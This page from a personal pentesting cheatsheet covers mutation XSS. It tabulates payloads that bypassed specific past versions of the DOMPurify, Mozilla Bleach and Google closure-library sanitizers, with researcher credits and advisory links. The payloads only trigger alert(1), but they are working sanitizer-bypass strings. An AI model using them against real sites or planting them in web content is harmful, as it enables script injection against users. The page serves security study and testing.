📒
My Pentesting Cheatsheet
  • Home
  • Commands Only Summary
    • Some other cool websites
  • Preparation
    • Documents
    • Contract - Checklist
    • Rules of Engagement - Checklist
    • Contractors Agreement - Checklist for Physical Assessments
  • Information Gathering
  • Vulnerability Assessment
  • Pentesting Machine
  • Enumeration
    • NMAP Scan types explained
    • Firewall and IDS/IPS Evasion
  • Footprinting
    • Google Dorks
    • Samba (smb)
    • NFS
    • DNS
    • SMTP
    • IMAP/POP3
    • SNMP
    • MySQL
    • MSSQL
    • Oracle TNS
    • IPMI
    • SSH
    • RDP
    • WinRM
  • Web Information Gathering
    • Whois
    • DNS & Subdomains
    • Fingerprinting
    • Crawlers
    • Search Engine Discovery
    • Automating Recon
  • Vulnerability Assessment
  • File Transfers
    • Windows Target
    • Linux Target
    • Transferring Files with Code
    • Miscellaneous File Transfer Methods
    • Protected Files Transfer
    • Catching Files over HTTP/S (Nginx)
    • Living Off The Land
    • Evading Detection
  • Shells & Payloads
    • Reverse Shells + Bind + Web
  • Password Attacks
    • John the ripper
    • Remote password attacks
    • Password mutations
    • Password Reuse / Default Passwords
    • Windows Local Password Attacks
    • Linux Local Password Attacks
    • Windows Lateral Movement
    • Cracking Files
  • Attacking Common Services
    • FTP
    • SMB
    • SQL
    • RDP
    • DNS
    • Email Services
  • Pivoting, Tunneling, and Port Forwarding
    • Choosing The Dig Site & Starting Our Tunnels
    • Playing Pong with Socat
    • Pivoting Around Obstacles
    • Branching Out Our Tunnels
    • Double Pivots
    • Final considerations
  • Active Directory Enumeration & Attacks
    • Initial Enumeration
    • Sniffing out a Foothold
    • Sighting In, Hunting For A User
    • Spray Responsibly
    • Deeper Down the Rabbit Hole
    • Kerberoasting - Cooking with Fire
    • Access Control List (ACL)
    • Advanced Privilege Escalation in Active Directory: Stacking The Deck
    • Domain trusts
    • Domain Trusts - Cross Forest
    • Defensive Considerations
  • Using Web Proxies
  • Login Brute Forcing
  • SQL Injection Fundamentals
    • Mitigating SQL Injection
  • SQLMap Essentials
    • Building Attacks
    • Database Enumeration
    • Advanced SQLMap Usage
  • Cross-Site Scripting (XSS)
    • Prevention
  • File Inclusion
  • File Upload Attacks
    • Basic Exploitation
    • Bypassing Filters
    • Other Upload Attacks
    • Prevention
  • Command Injections
    • Exploitation
    • Filter Evasion
  • Web Attacks
    • HTTP Verb Tampering
    • Insecure Direct Object References (IDOR)
    • XML External Entity (XXE) Injection
    • GraphQL
  • Attacking Common Applications
    • Application Discovery & Enumeration
    • Content Management Systems (CMS)
    • Servlet Containers/Software Development
    • Infrastructure/Network Monitoring Tools
    • Customer Service Mgmt & Configuration Management
    • Common Gateway Interfaces
    • Thick Client Applications
    • Miscellaneous Applications
  • Privilege Escalation
    • Linux Privilege Escalation
      • Information Gathering
      • Environment-based Privilege Escalation
      • Service-based Privilege Escalation
      • Linux Internals-based Privilege Escalation
      • Recent 0-Days
      • Linux Hardening
    • Windows Privilege Escalation
      • Getting the Lay of the Land
      • Windows User Privileges
      • Windows Group Privileges
      • Attacking the OS
      • Credential Theft
      • Restricted Environments
      • Additional Techniques
      • Dealing with End of Life Systems
      • Windows Hardening
    • Windows (old page)
  • Documentation & Reporting
    • Preparation
    • Reporting
  • Attacking Enterprise Networks
    • Pre-Engagement
    • External Testing
    • Internal Testing
    • Lateral Movement & Privilege Escalation
    • Wrapping Up
  • Deobfuscation
  • Metasploit
    • msfvenom
  • Custom compiled files
  • XSS
  • Azure AD (Entra ID)
Powered by GitBook
On this page
  • mXSS
  • / Payload examples
  • DomPurify
  • Mozilla Bleach
  • Google closure-library

XSS

PreviousCustom compiled filesNextAzure AD (Entra ID)

Last updated 6 months ago

mXSS

/ Payload examples

This page contains some examples of payloads used to bypass sanitizers in the past. There are many other examples but to avoid redundancy we will add only ones that include new vectors or techniques.

DomPurify

Version
Payload
Credit
Additional links

2.0.0

<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">

2.0.17

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

2.0.17

<math><mtext><table><mglyph><style><!--</style><img title="--&gt;&lt;/mglyph&gt;&lt;img&Tab;src=1&Tab;onerror=alert(1)&gt;">

2.0.17

<math><mtext><table><mglyph><style><math><table id=”</table>”><img src onerror=alert(1)”>

2.2.0

<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">

2.2.3

<svg><xss><desc><noscript>&lt;/noscript>&lt;/desc>&lt;p>&lt;/p>&lt;style>&lt;a title="&lt;/style>&lt;img src onerror=alert(1)>">

3.0.8

<svg><annotation-xml><foreignobject><style><!--</style><p id="--><img src='x' onerror='alert(1)'>">

3.1.0

n = 506; var payload = `${"<div>".repeat(n)}<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>${"</div>".repeat(n)}`;

N/A

3.1.7

<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">.

Mozilla Bleach

Version
Payload
Credit
Additional links

3.1.0

<noscript><style></noscript><img src=x onerror=alert(1)>

3.1.1

<svg><style><img src=x onerror=alert(1)>

3.2.3

<math><p></p><style><!--</style><img src/onerror=alert(1)>--></style></math>

Google closure-library

Version
Payload
Credit
Additional links

v20190215

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

Michał Bentkowski

Michał Bentkowski

Gareth Heyes

@web_payload team

Daniel Santos

Michał Bentkowski

Kévin - Mizu

Masato Kinugawa

Yaniv Nizry

Yaniv Nizry

Yaniv Nizry

Masato Kinugawa

@SecurityMB
https://research.securitum.com/dompurify-bypass-using-mxss/
@SecurityMB
https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/
@garethheyes
https://portswigger.net/research/bypassing-dompurify-again-with-mutation-xss
@sqrtrev
@0xParrot
@GuesserSuper
https://twitter.com/0xsapra/status/1307929537749999616?ref_src=twsrc%5Etfw
@bananabr
https://vovohelo.medium.com/from-svg-and-back-yet-another-mutation-xss-via-namespace-confusion-for-dompurify-2-2-2-bypass-5d9ae8b1878f
@SecurityMB
https://twitter.com/SecurityMB/status/1341290687963262978
@kevin_mizu
https://mizu.re/post/playing-with-dompurify-ce-handling
icesfont
@kinugawamasato
https://x.com/kinugawamasato/status/1843687909431582830
@YNizry
https://checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach/
@YNizry
https://checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach/
@YNizry
https://github.com/mozilla/bleach/security/advisories/GHSA-vv2x-vrpj-qqpq
@kinugawamasato
https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa
https://www.youtube.com/watch?v=lG7U3fuNw3A
mXSS cheatsheet
Source of table
Logo